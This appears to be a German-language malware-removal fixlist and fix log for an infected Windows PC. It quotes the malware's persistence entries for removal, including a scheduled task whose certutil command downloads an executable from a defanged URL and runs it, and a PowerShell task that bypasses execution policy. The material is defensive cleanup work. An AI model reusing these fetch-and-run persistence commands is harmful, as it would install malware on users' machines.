FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\Logic Cramble
R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
C:\Users\Nico\AppData\Local\XService
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
C:\Program Files\SystemaRev
R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
Unlock: C:\Windows\windefender.exe
C:\Windows\windefender.exe
R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
C:\Windows\qcusolizqbhuglpw.qcus
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
C:\ProgramData\PrefsSecure
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
C:\Program Files (x86)\ProxyGate
R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\csrss
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
Folder: C:\Windows\rss
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\resolve_run" => erfolgreich entfernt
C:\Program Files (x86)\Common Files\new.bat => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Chrome Update Helper" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => erfolgreich entfernt
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\muV82mBJud.exe" => erfolgreich entfernt
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69 => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PLRFCKFE44692QO" => erfolgreich entfernt
"C:\Program Files\RDH9TH3UTU" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2196509" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\okdd3kogot1" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\A4UX3F695ZAIC7C" => erfolgreich entfernt
"C:\Program Files (x86)\eu0vb4pykb5" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\flosdx" => erfolgreich entfernt
C:\Users\Nico\AppData\Local\pfialx.dll => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\KDY06ILDW1UEHVJ" => erfolgreich entfernt
"C:\Program Files\I88TDHYW3R" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PatientSunset" => erfolgreich entfernt
C:\Windows\rss\csrss.exe => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\QIJFFKRURZ.exe" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => erfolgreich entfernt
C:\Users\Nico\AppData\Roaming\EpicNet Inc => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
"HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
"HKLM\SOFTWARE\Policies\Google" => erfolgreich entfernt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => erfolgreich entfernt
HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{ielnksrch} => nicht gefunden
"HKLM\Software\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182} => erfolgreich verschoben
"C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi" => nicht gefunden
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\backlh" => erfolgreich entfernt
backlh => Dienst erfolgreich entfernt
C:\ProgramData\Logic Cramble => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\MicroService" => erfolgreich entfernt
MicroService => Dienst erfolgreich entfernt
C:\Users\Nico\AppData\Local\XService => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\SystemUpdate64" => erfolgreich entfernt
SystemUpdate64 => Dienst erfolgreich entfernt
C:\Program Files\SystemaRev => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\winamgr" => erfolgreich entfernt
winamgr => Dienst erfolgreich entfernt
WinDefender => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\WinDefender" => erfolgreich entfernt
WinDefender => Dienst erfolgreich entfernt
"C:\Windows\windefender.exe" => wurde entsperrt
Konnte nicht verschoben werden "C:\Windows\windefender.exe" => ist geplant bei Neustart verschoben zu werden.
